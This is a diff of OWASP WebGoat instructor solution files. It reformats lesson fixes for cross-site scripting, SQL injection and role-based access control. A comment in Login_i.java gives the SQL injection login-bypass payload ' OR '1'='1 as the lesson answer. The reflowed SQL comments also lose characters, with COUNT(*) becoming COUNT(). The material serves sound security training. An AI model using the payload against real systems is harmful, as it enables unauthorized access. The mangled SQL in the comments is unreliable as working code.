@@ -36,8 +27,8 @@ public class FindProfile_i extends FindProfile
 		super(lesson, lessonName, actionName, chainedAction);
 	}
 
-	protected String getRequestParameter(WebSession s, String name) 
+	protected String getRequestParameter(WebSession s, String name) throws ParameterNotFoundException,
-			throws ParameterNotFoundException, ValidationException
+			ValidationException
 	{
 		// NOTE:
 		//

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/CrossSiteScripting/UpdateProfile_i.java

@@ -1,9 +1,8 @@
+
 package org.owasp.webgoat.lessons.instructor.CrossSiteScripting;
 
 import java.util.regex.Pattern;
-
 import javax.servlet.http.HttpServletRequest;
-
 import org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting;
 import org.owasp.webgoat.lessons.CrossSiteScripting.UpdateProfile;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
@@ -14,29 +13,19 @@ import org.owasp.webgoat.session.ParameterParser;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 
-/* STAGE 2 FIXES
-Solution Summary: Edit UpdateProfile.java and change parseEmployeeProfile().  
-                  Modify parseEmployeeProfile() with lines denoted by // STAGE 2 - FIX.
-Solution Steps: 
-1. Talk about the different parser methods.  
-	a. parseEmployeeProfile(subjectId, s.getRequest()) 
-		- uses the request object directly.
-	 	- calling validate() on the appropriate parameter
-	b. parseEmployeeProfile(subjectId, s.getParser()) 
-		- uses the parser object to pull request data (centralized mechanism)
 
-2. Fix the request object version of the call  // STAGE 2 - FIX
+/*
-    Replace the call to:
+ * STAGE 2 FIXES Solution Summary: Edit UpdateProfile.java and change parseEmployeeProfile(). Modify
-	   String address1 = request.getParameter(CrossSiteScripting.ADDRESS1);
+ * parseEmployeeProfile() with lines denoted by // STAGE 2 - FIX. Solution Steps: 1. Talk about the
-   
+ * different parser methods. a. parseEmployeeProfile(subjectId, s.getRequest()) - uses the request
-    With:
+ * object directly. - calling validate() on the appropriate parameter b.
-	   final Pattern PATTERN_ADDRESS1 = Pattern.compile("[a-zA-Z0-9,\\.\\- ]{0,80}"); // STAGE 2 - FIX
+ * parseEmployeeProfile(subjectId, s.getParser()) - uses the parser object to pull request data
-	   String address1 = validate(request.getParameter(CrossSiteScripting.ADDRESS1), PATTERN_ADDRESS1); // STAGE 2 - FIX
+ * (centralized mechanism) 2. Fix the request object version of the call // STAGE 2 - FIX Replace
-
+ * the call to: String address1 = request.getParameter(CrossSiteScripting.ADDRESS1); With: final
-
+ * Pattern PATTERN_ADDRESS1 = Pattern.compile("[a-zA-Z0-9,\\.\\- ]{0,80}"); // STAGE 2 - FIX String
-3. Fix the parser version of the call.  //	 STAGE 2 - ALTERNATE FIX
+ * address1 = validate(request.getParameter(CrossSiteScripting.ADDRESS1), PATTERN_ADDRESS1); //
-	Change all calls in parseEmployeeProfile(subjectId, s.getParser()) to use
+ * STAGE 2 - FIX 3. Fix the parser version of the call. // STAGE 2 - ALTERNATE FIX Change all calls
-	the appropriate parser.method() call
+ * in parseEmployeeProfile(subjectId, s.getParser()) to use the appropriate parser.method() call
  */
 
 public class UpdateProfile_i extends UpdateProfile
@@ -46,8 +35,8 @@ public class UpdateProfile_i extends UpdateProfile
 		super(lesson, lessonName, actionName, chainedAction);
 	}
 
-
+	protected Employee parseEmployeeProfile(int subjectId, WebSession s) throws ParameterNotFoundException,
-	protected Employee parseEmployeeProfile(int subjectId, WebSession s) throws ParameterNotFoundException, ValidationException
+			ValidationException
 	{
 		HttpServletRequest request = s.getRequest();
 		String firstName = request.getParameter(CrossSiteScripting.FIRST_NAME);
@@ -56,9 +45,14 @@ public class UpdateProfile_i extends UpdateProfile
 		String title = request.getParameter(CrossSiteScripting.TITLE);
 		String phone = request.getParameter(CrossSiteScripting.PHONE_NUMBER);
 
-		// Validate this parameter against a regular expression pattern designed for street addresses.
+		// Validate this parameter against a regular expression pattern designed for street
-		final Pattern PATTERN_ADDRESS1 = Pattern.compile("[a-zA-Z0-9,\\.\\- ]{0,80}"); // STAGE 2 - FIX
+		// addresses.
-		String address1 = validate(request.getParameter(CrossSiteScripting.ADDRESS1), PATTERN_ADDRESS1); // STAGE 2 - FIX
+		final Pattern PATTERN_ADDRESS1 = Pattern.compile("[a-zA-Z0-9,\\.\\- ]{0,80}"); // STAGE 2 -
+																						// FIX
+		String address1 = validate(request.getParameter(CrossSiteScripting.ADDRESS1), PATTERN_ADDRESS1); // STAGE
+																											// 2
+																											// -
+																											// FIX
 
 		String address2 = request.getParameter(CrossSiteScripting.ADDRESS2);
 		int manager = Integer.parseInt(request.getParameter(CrossSiteScripting.MANAGER));
@@ -70,16 +64,15 @@ public class UpdateProfile_i extends UpdateProfile
 		String disciplinaryActionNotes = request.getParameter(CrossSiteScripting.DISCIPLINARY_NOTES);
 		String personalDescription = request.getParameter(CrossSiteScripting.DESCRIPTION);
 
-		Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone,
+		Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2,
-				address1, address2, manager, startDate, salary,
+				manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
-				ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
 				personalDescription);
 
 		return employee;
 	}
 
-	protected Employee parseEmployeeProfile(int subjectId, ParameterParser parser) 
+	protected Employee parseEmployeeProfile(int subjectId, ParameterParser parser) throws ParameterNotFoundException,
-			throws ParameterNotFoundException, ValidationException
+			ValidationException
 	{
 		// STAGE 2 - ALTERNATE FIX
 		String firstName = parser.getStrictAlphaParameter(CrossSiteScripting.FIRST_NAME, 20);
@@ -98,9 +91,8 @@ public class UpdateProfile_i extends UpdateProfile
 		String disciplinaryActionNotes = parser.getStrictAlphaParameter(CrossSiteScripting.DISCIPLINARY_NOTES, 60);
 		String personalDescription = parser.getStrictAlphaParameter(CrossSiteScripting.DESCRIPTION, 60);
 
-		Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone,
+		Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2,
-				address1, address2, manager, startDate, salary,
+				manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
-				ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
 				personalDescription);
 
 		return employee;

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/CrossSiteScripting/ViewProfile_i.java

@@ -1,13 +1,13 @@
+
 package org.owasp.webgoat.lessons.instructor.CrossSiteScripting;
 
 import org.owasp.webgoat.lessons.CrossSiteScripting.ViewProfile;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 
-/* STAGE 4 FIXES
-Solution Summary: Look in the WebContent/lesson/CrossSiteScripting/ViewProfile.jsp
-
-Look for the <-- STAGE 4 - FIX    in the ViewProfile.jsp
 
+/*
+ * STAGE 4 FIXES Solution Summary: Look in the WebContent/lesson/CrossSiteScripting/ViewProfile.jsp
+ * Look for the <-- STAGE 4 - FIX in the ViewProfile.jsp
  */
 
 public class ViewProfile_i extends ViewProfile

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/DBCrossSiteScripting/UpdateProfile_i.java

@@ -1,130 +1,58 @@
+
 package org.owasp.webgoat.lessons.instructor.DBCrossSiteScripting;
 
 import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
 import org.owasp.webgoat.lessons.CrossSiteScripting.UpdateProfile;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 
-/* STAGE 2 FIXES
-Solution Summary (1. or 2.) 
-    1. Modify the UPDATE_EMPLOYEE stored procedure in the database and add
-       a validation step. Oracle 10G now supports regular expressions.
-    2. Apply a column constraint can also work IFF the existing data is clean
-
-Solution Steps: 
-1. Talk about the different database approaches.
-	a. Apply validation in the UPDATE stored proc
-		- Possible to bypass by not using that stored proc
-
-	b. Apply a table column constraint 
-		- Cannot be bypassed. The DB enforces the constraint under all conditions
-
-2. Fix the stored proc
-
-Define the pattern.
-Validate the field against the pattern.
-Raise an exception if invalid.
-
-CREATE OR REPLACE PROCEDURE UPDATE_EMPLOYEE(
-    v_userid IN employee.userid%type, 
-    v_first_name IN employee.first_name%type, 
-    v_last_name IN employee.last_name%type, 
-    v_ssn IN employee.ssn%type, 
-    v_title IN employee.title%type, 
-    v_phone IN employee.phone%type, 
-    v_address1 IN employee.address1%type, 
-    v_address2 IN employee.address2%type, 
-    v_manager IN employee.manager%type, 
-    v_start_date IN employee.start_date%type, 
-    v_salary IN employee.salary%type, 
-    v_ccn IN employee.ccn%type, 
-    v_ccn_limit IN employee.ccn_limit%type, 
-    v_disciplined_date IN employee.disciplined_date%type, 
-    v_disciplined_notes IN employee.disciplined_notes%type, 
-    v_personal_description IN employee.personal_description%type
-)
-AS 
-    P_ADDRESS1 VARCHAR2(100) := '^[a-zA-Z0-9,\. ]{0,80}$';  
-BEGIN
-    IF NOT REGEXP_LIKE(v_address1, P_ADDRESS1) THEN     
-        RAISE VALUE_ERROR;                              
-    END IF;                                             
-    UPDATE EMPLOYEE
-    SET
-        first_name = v_first_name, 
-        last_name = v_last_name, 
-        ssn = v_ssn, 
-        title = v_title, 
-        phone = v_phone, 
-        address1 = v_address1, 
-        address2 = v_address2, 
-        manager = v_manager, 
-        start_date = v_Start_date,
-        salary = v_salary, 
-        ccn = v_ccn, 
-        ccn_limit = v_ccn_limit, 
-        disciplined_date = v_disciplined_date, 
-        disciplined_notes = v_disciplined_notes, 
-        personal_description = v_personal_description
-    WHERE
-        userid = v_userid;
-END;
-/
-
-3. Apply a table column constraint
-   	ALTER TABLE EMPLOYEE
-		ADD CONSTRAINT address1_ck CHECK (REGEXP_LIKE(address1, '^[a-zA-Z0-9,\. ]{0,80}$'));
-		
-
-FOR SQL SERVER, the following is required:
-
-
-DROP PROCEDURE webgoat_guest.UPDATE_EMPLOYEE
-GO
-
-CREATE PROCEDURE webgoat_guest.UPDATE_EMPLOYEE
-    @v_userid INT,
-    @v_first_name VARCHAR(20),
-    @v_last_name VARCHAR(20),
-    @v_ssn VARCHAR(12),
-    @v_title VARCHAR(20),
-    @v_phone VARCHAR(13),
-    @v_address1 VARCHAR(80),
-    @v_address2 VARCHAR(80),
-    @v_manager INT,
-    @v_start_date CHAR(8),
-    @v_salary INT,
-    @v_ccn VARCHAR(30),
-    @v_ccn_limit INT,
-    @v_disciplined_date CHAR(8),
-    @v_disciplined_notes VARCHAR(60),
-    @v_personal_description VARCHAR(60)
-AS
-    IF [webgoat_guest].RegexMatch(@v_address1, N'^[a-zA-Z0-9,\. ]{0,80}$') = 0
-        BEGIN
-          RAISERROR('Illegal characters in address1', 11, 1)
-          RETURN
-        END
-    UPDATE EMPLOYEE
-    SET
-        first_name = @v_first_name, 
-        last_name = @v_last_name, 
-        ssn = @v_ssn, 
-        title = @v_title, 
-        phone = @v_phone, 
-        address1 = @v_address1, 
-        address2 = @v_address2, 
-        manager = @v_manager, 
-        start_date = @v_Start_date,
-        salary = @v_salary, 
-        ccn = @v_ccn, 
-        ccn_limit = @v_ccn_limit, 
-        disciplined_date = @v_disciplined_date, 
-        disciplined_notes = @v_disciplined_notes, 
-        personal_description = @v_personal_description
-    WHERE
-        userid = @v_userid;
-GO
 
+/*
+ * STAGE 2 FIXES Solution Summary (1. or 2.) 1. Modify the UPDATE_EMPLOYEE stored procedure in the
+ * database and add a validation step. Oracle 10G now supports regular expressions. 2. Apply a
+ * column constraint can also work IFF the existing data is clean Solution Steps: 1. Talk about the
+ * different database approaches. a. Apply validation in the UPDATE stored proc - Possible to bypass
+ * by not using that stored proc b. Apply a table column constraint - Cannot be bypassed. The DB
+ * enforces the constraint under all conditions 2. Fix the stored proc Define the pattern. Validate
+ * the field against the pattern. Raise an exception if invalid. CREATE OR REPLACE PROCEDURE
+ * UPDATE_EMPLOYEE( v_userid IN employee.userid%type, v_first_name IN employee.first_name%type,
+ * v_last_name IN employee.last_name%type, v_ssn IN employee.ssn%type, v_title IN
+ * employee.title%type, v_phone IN employee.phone%type, v_address1 IN employee.address1%type,
+ * v_address2 IN employee.address2%type, v_manager IN employee.manager%type, v_start_date IN
+ * employee.start_date%type, v_salary IN employee.salary%type, v_ccn IN employee.ccn%type,
+ * v_ccn_limit IN employee.ccn_limit%type, v_disciplined_date IN employee.disciplined_date%type,
+ * v_disciplined_notes IN employee.disciplined_notes%type, v_personal_description IN
+ * employee.personal_description%type ) AS P_ADDRESS1 VARCHAR2(100) := '^[a-zA-Z0-9,\. ]{0,80}$';
+ * BEGIN IF NOT REGEXP_LIKE(v_address1, P_ADDRESS1) THEN RAISE VALUE_ERROR; END IF; UPDATE EMPLOYEE
+ * SET first_name = v_first_name, last_name = v_last_name, ssn = v_ssn, title = v_title, phone =
+ * v_phone, address1 = v_address1, address2 = v_address2, manager = v_manager, start_date =
+ * v_Start_date, salary = v_salary, ccn = v_ccn, ccn_limit = v_ccn_limit, disciplined_date =
+ * v_disciplined_date, disciplined_notes = v_disciplined_notes, personal_description =
+ * v_personal_description WHERE userid = v_userid; END; / 3. Apply a table column constraint ALTER
+ * TABLE EMPLOYEE ADD CONSTRAINT address1_ck CHECK (REGEXP_LIKE(address1, '^[a-zA-Z0-9,\.
+ * ]{0,80}$')); FOR SQL SERVER, the following is required: DROP PROCEDURE
+ * webgoat_guest.UPDATE_EMPLOYEE GO CREATE PROCEDURE webgoat_guest.UPDATE_EMPLOYEE
+ * @v_userid INT,
+ * @v_first_name VARCHAR(20),
+ * @v_last_name VARCHAR(20),
+ * @v_ssn VARCHAR(12),
+ * @v_title VARCHAR(20),
+ * @v_phone VARCHAR(13),
+ * @v_address1 VARCHAR(80),
+ * @v_address2 VARCHAR(80),
+ * @v_manager INT,
+ * @v_start_date CHAR(8),
+ * @v_salary INT,
+ * @v_ccn VARCHAR(30),
+ * @v_ccn_limit INT,
+ * @v_disciplined_date CHAR(8),
+ * @v_disciplined_notes VARCHAR(60),
+ * @v_personal_description VARCHAR(60) AS IF [webgoat_guest].RegexMatch(@v_address1,
+ * N'^[a-zA-Z0-9,\. ]{0,80}$') = 0 BEGIN RAISERROR('Illegal characters in address1', 11, 1) RETURN
+ * END UPDATE EMPLOYEE SET first_name = @v_first_name, last_name = @v_last_name, ssn = @v_ssn, title
+ * = @v_title, phone = @v_phone, address1 = @v_address1, address2 = @v_address2, manager =
+ * @v_manager, start_date = @v_Start_date, salary = @v_salary, ccn = @v_ccn, ccn_limit =
+ * @v_ccn_limit, disciplined_date = @v_disciplined_date, disciplined_notes = @v_disciplined_notes,
+ * personal_description = @v_personal_description WHERE userid = @v_userid; GO
  */
 
 public class UpdateProfile_i extends UpdateProfile

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/DBSQLInjection/Login_i.java

@@ -1,44 +1,17 @@
+
 package org.owasp.webgoat.lessons.instructor.DBSQLInjection;
 
 /*
- * The solution is to choose Neville's userid, and enter a password like:
+ * The solution is to choose Neville's userid, and enter a password like: ' OR '1'='1 Modify the
- * ' OR '1'='1
+ * Stored function LOGIN_EMPLOYEE to use fixed statements or bind variables For ORACLE: CREATE OR
- * Modify the Stored function LOGIN_EMPLOYEE to use fixed statements or bind variables
+ * REPLACE FUNCTION WEBGOAT_guest.EMPLOYEE_LOGIN(v_id NUMBER, v_password VARCHAR) RETURN NUMBER AS
- * 
+ * cnt NUMBER; BEGIN SELECT COUNT() INTO cnt FROM EMPLOYEE WHERE USERID = v_id AND PASSWORD =
- * 
+ * v_password; RETURN cnt; END; / OR CREATE OR REPLACE FUNCTION WEBGOAT_guest.EMPLOYEE_LOGIN(v_id
- * For ORACLE:
+ * NUMBER, v_password VARCHAR) RETURN NUMBER AS stmt VARCHAR(32767); cnt NUMBER; BEGIN stmt :=
-CREATE OR REPLACE FUNCTION WEBGOAT_guest.EMPLOYEE_LOGIN(v_id NUMBER, v_password VARCHAR) RETURN NUMBER AS
+ * 'SELECT COUNT () FROM EMPLOYEE WHERE USERID = :1 AND PASSWORD = :2'; EXECUTE IMMEDIATE stmt INTO
-    cnt NUMBER;
+ * cnt USING v_id, v_password; RETURN cnt; END; / For SQL SERVER CREATE FUNCTION
-BEGIN
+ * webgoat_guest.EMPLOYEE_LOGIN (
-  SELECT COUNT(*) INTO cnt FROM EMPLOYEE
+ * @v_id INT,
-    WHERE USERID = v_id
+ * @v_password VARCHAR(100) ) RETURNS INTEGER AS BEGIN DECLARE @count int SELECT @count = COUNT()
-      AND PASSWORD = v_password;
+ * FROM EMPLOYEE WHERE USERID = @v_id AND PASSWORD = @v_password; return @count END
-  RETURN cnt;
-END;
-/
-
-* OR
-
-CREATE OR REPLACE FUNCTION WEBGOAT_guest.EMPLOYEE_LOGIN(v_id NUMBER, v_password VARCHAR) RETURN NUMBER AS
-    stmt VARCHAR(32767); cnt NUMBER;
-BEGIN
-    stmt  := 'SELECT COUNT (*) FROM EMPLOYEE WHERE USERID = :1 AND PASSWORD = :2';
-    EXECUTE IMMEDIATE stmt INTO cnt USING v_id, v_password;
-    RETURN cnt;
-END;
-/
-    
- * For SQL SERVER
-    
-CREATE FUNCTION webgoat_guest.EMPLOYEE_LOGIN (
-    @v_id INT,
-    @v_password VARCHAR(100)
-) RETURNS INTEGER
-AS
-    BEGIN
-        DECLARE @count int
-        SELECT @count = COUNT(*) FROM EMPLOYEE WHERE USERID = @v_id AND PASSWORD = @v_password;
-        return @count
-    END
-
  */

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/RoleBasedAccessControl/DeleteProfile_i.java

@@ -1,9 +1,9 @@
+
 package org.owasp.webgoat.lessons.instructor.RoleBasedAccessControl;
 
 import java.sql.ResultSet;
 import java.sql.SQLException;
 import java.sql.Statement;
-
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
 import org.owasp.webgoat.lessons.RoleBasedAccessControl.DeleteProfile;
@@ -11,17 +11,16 @@ import org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl;
 import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.WebSession;
 
+
 public class DeleteProfile_i extends DeleteProfile
 {
 
-	
 	public DeleteProfile_i(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
 	{
 		super(lesson, lessonName, actionName, chainedAction);
 	}
 
-	public void doDeleteEmployeeProfile(WebSession s, int userId, int employeeId)
+	public void doDeleteEmployeeProfile(WebSession s, int userId, int employeeId) throws UnauthorizedException
-			throws UnauthorizedException
 	{
 		if (s.isAuthorizedInLesson(userId, RoleBasedAccessControl.DELETEPROFILE_ACTION)) // FIX
 		{
@@ -31,16 +30,15 @@ public class DeleteProfile_i extends DeleteProfile
 				// System.out.println("Query:  " + query);
 				try
 				{
-					Statement statement = WebSession.getConnection(s).createStatement( ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
+					Statement statement = WebSession.getConnection(s)
+							.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
 					statement.executeUpdate(query);
-				}
+				} catch (SQLException sqle)
-				catch ( SQLException sqle )
 				{
 					s.setMessage("Error deleting employee profile");
 					sqle.printStackTrace();
 				}
-			}
+			} catch (Exception e)
-			catch ( Exception e )
 			{
 				s.setMessage("Error deleting employee profile");
 				e.printStackTrace();

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/RoleBasedAccessControl/EditProfile_i.java

@@ -1,9 +1,9 @@
+
 package org.owasp.webgoat.lessons.instructor.RoleBasedAccessControl;
 
 import java.sql.PreparedStatement;
 import java.sql.ResultSet;
 import java.sql.SQLException;
-
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 import org.owasp.webgoat.lessons.RoleBasedAccessControl.EditProfile;
 import org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl;
@@ -11,11 +11,12 @@ import org.owasp.webgoat.session.Employee;
 import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.WebSession;
 
+
 /**
  * Copyright (c) 2006 Free Software Foundation developed under the custody of the Open Web
- *  Application Security Project (http://www.owasp.org) This software package org.owasp.webgoat.is published by OWASP
+ * Application Security Project (http://www.owasp.org) This software package org.owasp.webgoat.is
- *  under the GPL. You should read and accept the LICENSE before you use, modify and/or redistribute
+ * published by OWASP under the GPL. You should read and accept the LICENSE before you use, modify
- *  this software.
+ * and/or redistribute this software.
  * 
  */
 
@@ -32,11 +33,11 @@ public class EditProfile_i extends EditProfile
 		super(lesson, lessonName, actionName);
 	}
 
-	public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId)
+	public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
-			throws UnauthorizedException
 	{
 		// Query the database to determine if this employee has access to this function
-		// Query the database for the profile data of the given employee if "owned" by the given user
+		// Query the database for the profile data of the given employee if "owned" by the given
+		// user
 
 		Employee profile = null;
 
@@ -49,42 +50,33 @@ public class EditProfile_i extends EditProfile
 
 				try
 				{
-					PreparedStatement answer_statement = WebSession.getConnection(s).prepareStatement( query, 
+					PreparedStatement answer_statement = WebSession.getConnection(s)
-							ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
+							.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
 					answer_statement.setInt(1, subjectUserId);
 					ResultSet answer_results = answer_statement.executeQuery();
 					if (answer_results.next())
 					{
 						// Note: Do NOT get the password field.
-						profile = new Employee(
+						profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
-								answer_results.getInt("userid"),
+								answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
-								answer_results.getString("first_name"),
+										.getString("title"), answer_results.getString("phone"), answer_results
-								answer_results.getString("last_name"),
+										.getString("address1"), answer_results.getString("address2"), answer_results
-								answer_results.getString("ssn"),
+										.getInt("manager"), answer_results.getString("start_date"), answer_results
-								answer_results.getString("title"),
+										.getInt("salary"), answer_results.getString("ccn"), answer_results
-								answer_results.getString("phone"),
+										.getInt("ccn_limit"), answer_results.getString("disciplined_date"),
-								answer_results.getString("address1"),
+								answer_results.getString("disciplined_notes"), answer_results
-								answer_results.getString("address2"),
+										.getString("personal_description"));
-								answer_results.getInt("manager"),
+						/*
-								answer_results.getString("start_date"),
+						 * System.out.println("Retrieved employee from db: " +
-								answer_results.getInt("salary"),
+						 * profile.getFirstName() + " " + profile.getLastName() + " (" +
-								answer_results.getString("ccn"),
+						 * profile.getId() + ")");
-								answer_results.getInt("ccn_limit"),
-								answer_results.getString("disciplined_date"),
-								answer_results.getString("disciplined_notes"),
-								answer_results.getString("personal_description"));
-/*						System.out.println("Retrieved employee from db: " + 
-								profile.getFirstName() + " " + profile.getLastName() + 
-								" (" + profile.getId() + ")");
 						 */}
-				}
+				} catch (SQLException sqle)
-				catch ( SQLException sqle )
 				{
 					s.setMessage("Error getting employee profile");
 					sqle.printStackTrace();
 				}
-			}
+			} catch (Exception e)
-			catch ( Exception e )
 			{
 				s.setMessage("Error getting employee profile");
 				e.printStackTrace();

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/instructor/RoleBasedAccessControl/RoleBasedAccessControl_i.java

@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons.instructor.RoleBasedAccessControl;
 
 import org.apache.ecs.ElementContainer;
@@ -11,41 +12,33 @@ import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 
+
 /**
  * Copyright (c) 2006 Free Software Foundation developed under the custody of the Open Web
- *  Application Security Project (http://www.owasp.org) This software package org.owasp.webgoat.is published by OWASP
+ * Application Security Project (http://www.owasp.org) This software package org.owasp.webgoat.is
- *  under the GPL. You should read and accept the LICENSE before you use, modify and/or redistribute
+ * published by OWASP under the GPL. You should read and accept the LICENSE before you use, modify
- *  this software.
+ * and/or redistribute this software.
  * 
  */
 
-/* STAGE 2 FIXES
+/*
-Solution Summary: Edit RoleBasedAccessControl.java and change handleRequest().  
+ * STAGE 2 FIXES Solution Summary: Edit RoleBasedAccessControl.java and change handleRequest().
-                  Modify handleRequest() with lines denoted by // STAGE 2 - FIX.
+ * Modify handleRequest() with lines denoted by // STAGE 2 - FIX. Solution Steps: 1. This solution
-Solution Steps: 
+ * adds an access control check in the controller. Point out that their architecture may require the
-1. This solution adds an access control check in the controller.
+ * check to occur in the business function. 2. Look at the RoleBasedAccessControl class identify
-   Point out that their architecture may require the check to occur in the business function.
+ * where execution happens of an action. a. action.handleRequest(s); is not protected by an access
-2. Look at the RoleBasedAccessControl class identify where execution happens of an action.
+ * control check. b. look at handleRequest(s) to determine where access control check should occur.
-	a. action.handleRequest(s); is not protected by an access control check.
+ * c. add protection by a programmatic authorization check before dispatching to the action: 1. Add
-	b. look at handleRequest(s) to determine where access control check should occur.
+ * an isAuthorized() call before dispatching to the action, and throw an unauthorized exception.
-	c. add protection by a programmatic authorization check before dispatching to the action:
+ * Tell student this exception exists. Use eclipse command completion to find the isAuthorized()
-		1. Add an isAuthorized() call before dispatching to the action, 
+ * call on the action. From command completion - determine calling arguments of isAuthorized() int
-		       and throw an unauthorized exception.  Tell student this exception exists. 
+ * userId = action.getUserId(s); if (action.isAuthorized(s, userId, action.getActionName())) {
-		   Use eclipse command completion to find the isAuthorized() call on the action.  
+ * action.handleRequest(s); } else throw new UnauthorizedException(); Repeat stage 1 and note that
-		   From command completion - determine calling arguments of isAuthorized()
+ * the function fails with a "Not authorized" message. Tom will be in the list again, because the DB
-		   
+ * is reset when lesson restarts. Adding the access check in the
-		    				int userId = action.getUserId(s); 
+ * RoleBasedAccessControl:handleRequest() is putting the check in the “Controller” The access check
-							if (action.isAuthorized(s, userId, action.getActionName()))
+ * can also be added to DeleteProfile.deleteEmployeeProfile(), which is putting the check in the
-							{
+ * “Business Function”
-								action.handleRequest(s);
-							}
-							else				
-								throw new UnauthorizedException();
-
-Repeat stage 1 and note that the function fails with a "Not authorized" message.
- Tom will be in the list again, because the DB is reset when lesson restarts.
- Adding the access check in the RoleBasedAccessControl:handleRequest() is putting the check in the “Controller”
- The access check can also be added to DeleteProfile.deleteEmployeeProfile(), which is putting the check in the “Business Function”
  */
 
 public class RoleBasedAccessControl_i extends RoleBasedAccessControl
@@ -54,15 +47,13 @@ public class RoleBasedAccessControl_i extends RoleBasedAccessControl
 	public void handleRequest(WebSession s)
 	{
 		// System.out.println("RoleBasedAccessControl.handleRequest()");
-		if (s.getLessonSession(this) == null)
+		if (s.getLessonSession(this) == null) s.openLessonSession(this);
-			s.openLessonSession(this);
 
 		String requestedActionName = null;
 		try
 		{
 			requestedActionName = s.getParser().getStringParameter("action");
-		}
+		} catch (ParameterNotFoundException pnfe)
-		catch (ParameterNotFoundException pnfe) 
 		{
 			// Missing the action - send them back to login.
 			requestedActionName = LOGIN_ACTION;
@@ -74,7 +65,8 @@ public class RoleBasedAccessControl_i extends RoleBasedAccessControl
 			if (action != null)
 			{
 				// FIXME: This code has gotten much uglier
-				//System.out.println("RoleBasedAccessControl.handleRequest() dispatching to: " + action.getActionName());
+				// System.out.println("RoleBasedAccessControl.handleRequest() dispatching to: " +
+				// action.getActionName());
 				if (!action.requiresAuthentication())
 				{
 					// Access to Login does not require authentication.
@@ -106,26 +98,22 @@ public class RoleBasedAccessControl_i extends RoleBasedAccessControl
 			}
 			else
 				setCurrentAction(s, ERROR_ACTION);
-		}
+		} catch (ParameterNotFoundException pnfe)
-		catch (ParameterNotFoundException pnfe)
 		{
 			// System.out.println("Missing parameter");
 			pnfe.printStackTrace();
 			setCurrentAction(s, ERROR_ACTION);
-		}
+		} catch (ValidationException ve)
-		catch (ValidationException ve)
 		{
 			// System.out.println("Validation failed");
 			ve.printStackTrace();
 			setCurrentAction(s, ERROR_ACTION);
-		}
+		} catch (UnauthenticatedException ue)
-		catch (UnauthenticatedException ue)
 		{
 			s.setMessage("Login failed");
 			// System.out.println("Authentication failure");
 			ue.printStackTrace();
-		}
+		} catch (UnauthorizedException ue2)
-		catch (UnauthorizedException ue2)
 		{
 			String stage = getStage(s);
 			// Update lesson status if necessary.
@@ -133,8 +121,8 @@ public class RoleBasedAccessControl_i extends RoleBasedAccessControl
 			{
 				try
 				{
-				if (GoatHillsFinancial.DELETEPROFILE_ACTION.equals(requestedActionName) &&
+					if (GoatHillsFinancial.DELETEPROFILE_ACTION.equals(requestedActionName)
-						!isAuthorized(s, getUserId(s), GoatHillsFinancial.DELETEPROFILE_ACTION))
+							&& !isAuthorized(s, getUserId(s), GoatHillsFinancial.DELETEPROFILE_ACTION))
 					{
 						setStageComplete(s, STAGE2);
 					}
@@ -151,10 +139,9 @@ public class RoleBasedAccessControl_i extends RoleBasedAccessControl
 				{
 					// System.out.println("Checking for stage 4 completion");
 					DefaultLessonAction action = (DefaultLessonAction) getAction(getCurrentAction(s));
-				int userId = Integer.parseInt((String)s.getRequest().getSession().getAttribute(getLessonName() + "."
+					int userId = Integer.parseInt((String) s.getRequest().getSession()
-						+ GoatHillsFinancial.USER_ID));
+							.getAttribute(getLessonName() + "." + GoatHillsFinancial.USER_ID));
-				int employeeId = s.getParser().getIntParameter(
+					int employeeId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID);
-					GoatHillsFinancial.EMPLOYEE_ID);
 
 					if (!action.isAuthorizedForEmployee(s, userId, employeeId))
 					{
@@ -178,5 +165,3 @@ public class RoleBasedAccessControl_i extends RoleBasedAccessControl
 	}
 
 }
-
-

